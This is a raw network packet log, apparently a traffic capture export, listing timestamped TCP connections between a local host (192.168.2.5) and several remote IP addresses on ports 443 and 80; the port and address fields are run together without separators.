                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.642750978 CET49888443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.642784119 CET4434988820.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.642879009 CET49888443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.643610001 CET49888443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.643625021 CET4434988820.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.693428993 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.693455935 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.693499088 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.693515062 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.693562984 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.701229095 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.701360941 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.706234932 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.706259012 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.706265926 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.706310987 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.706319094 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.706362009 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.706383944 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.706423044 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.706454992 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.706454992 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.706454992 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.706454992 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.706496954 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.710303068 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.710331917 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.710339069 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.710355997 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.710365057 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.710371971 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.710391998 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.710417032 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.710431099 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.710467100 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.716150045 CET4434987813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.716310978 CET4434987813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.716500998 CET49878443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.718194008 CET49878443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.718221903 CET4434987813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.718266010 CET49878443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.718281984 CET4434987813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.724812031 CET49889443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.724896908 CET4434988913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.724982023 CET49889443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.725770950 CET49889443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.725797892 CET4434988913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.746937990 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.746958971 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.747072935 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.747080088 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.747168064 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.829734087 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.829752922 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.829782963 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.829817057 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.829843044 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.829866886 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.833834887 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.833885908 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.833919048 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.833930016 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.833956957 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.833992958 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.834103107 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.834153891 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.869401932 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.869427919 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.869488001 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.869494915 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.869512081 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.869585991 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.877496958 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.885778904 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.885845900 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.891302109 CET4434988213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.892023087 CET49882443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.892035961 CET4434988213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.893615007 CET49882443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.893618107 CET4434988213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.909621954 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.909641027 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.909693003 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.909698009 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.909941912 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.912728071 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.912786961 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.912791967 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.912821054 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.912936926 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.913067102 CET49880443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.913079023 CET4434988023.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.916574001 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.916589975 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.916651011 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.916671991 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.916738033 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.920614958 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.920631886 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.920679092 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.920692921 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.920743942 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.935172081 CET4434988313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.935566902 CET49883443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.935584068 CET4434988313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.936008930 CET49883443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.936012983 CET4434988313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.980417967 CET4434988413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.988590002 CET49884443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.988610029 CET4434988413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.989021063 CET49884443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:47.989026070 CET4434988413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.016014099 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.016030073 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.016133070 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.016150951 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.016216993 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.025804996 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.025854111 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.025907993 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.025918007 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.025949001 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.025969982 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.030322075 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.030420065 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.039805889 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.039900064 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.044418097 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.044480085 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.044487000 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.044631958 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.044661999 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.044671059 CET4434988123.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.044699907 CET49881443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.060059071 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.060080051 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.060139894 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.060162067 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.060189009 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.060206890 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.070940971 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.071008921 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.122308969 CET4434988513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.122920036 CET49885443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.122976065 CET4434988513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.123765945 CET49885443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.123783112 CET4434988513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.134036064 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.134056091 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.134150028 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.134165049 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.134278059 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.134337902 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.139439106 CET49879443192.168.2.523.57.90.101
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.139466047 CET4434987923.57.90.101192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.315761089 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.315824986 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.348795891 CET4434988213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.348865986 CET4434988213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.348980904 CET49882443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.356775045 CET49882443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.356775045 CET49882443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.356794119 CET4434988213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.356803894 CET4434988213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.360205889 CET49890443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.360275030 CET4434989013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.360428095 CET49890443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.360631943 CET49890443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.360672951 CET4434989013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.371825933 CET4434988313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.371910095 CET4434988313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.372028112 CET49883443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.372077942 CET49883443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.372096062 CET4434988313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.372108936 CET49883443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.372113943 CET4434988313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.374481916 CET49891443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.374568939 CET4434989113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.374794006 CET49891443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.374970913 CET49891443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.375006914 CET4434989113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.381359100 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.434391022 CET4434988413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.434559107 CET4434988413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.434611082 CET49884443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.434650898 CET49884443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.434669971 CET4434988413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.434679031 CET49884443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.434684038 CET4434988413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.436933994 CET49892443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.436991930 CET4434989213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.437207937 CET49892443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.437267065 CET49892443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.437285900 CET4434989213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.502799034 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.574476957 CET49893443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.574542999 CET4434989320.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.574796915 CET49893443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.575184107 CET49893443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.575212955 CET4434989320.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.580903053 CET4434988513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.580986023 CET4434988513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.581070900 CET49885443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.582128048 CET49885443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.582128048 CET49885443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.582154036 CET4434988513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.582175970 CET4434988513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.590816975 CET49894443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.590873957 CET4434989413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.591850042 CET49894443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.592330933 CET49894443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.592361927 CET4434989413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.844160080 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.844296932 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.844490051 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.844676018 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.844809055 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.849450111 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.942964077 CET49895443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.943022013 CET4434989520.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.943274021 CET49895443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.943625927 CET49895443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.943658113 CET4434989520.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.970549107 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.176707029 CET4434988640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.177798986 CET49886443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.177839994 CET4434988640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.178930998 CET49886443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.178952932 CET4434988640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.178991079 CET49886443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.179007053 CET4434988640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.311434031 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.311505079 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.324302912 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.434283018 CET4434988820.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.440598011 CET49888443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.440613031 CET4434988820.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.440992117 CET4434988820.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.443017960 CET49888443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.443084002 CET4434988820.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.443393946 CET49888443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.443454981 CET49888443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.443476915 CET4434988820.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.445895910 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.460843086 CET4434988720.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.461097002 CET49887443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.461133003 CET4434988720.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.461643934 CET4434988720.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.462276936 CET49887443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.462368965 CET4434988720.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.462666035 CET49887443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.462708950 CET49887443192.168.2.520.189.173.9
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.462769032 CET4434988720.189.173.9192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.507208109 CET4434988913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.527776957 CET49889443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.527836084 CET4434988913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.528703928 CET49889443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.528717995 CET4434988913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.865000963 CET4434988640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.865019083 CET4434988640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.865091085 CET4434988640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.865098000 CET49886443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.865170956 CET4434988640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.865202904 CET4434988640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.865211010 CET49886443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.865262985 CET49886443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.865664005 CET49886443192.168.2.540.126.31.71
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.865700006 CET4434988640.126.31.71192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:49.865724087 CET49886443192.168.2.540.126.31.71
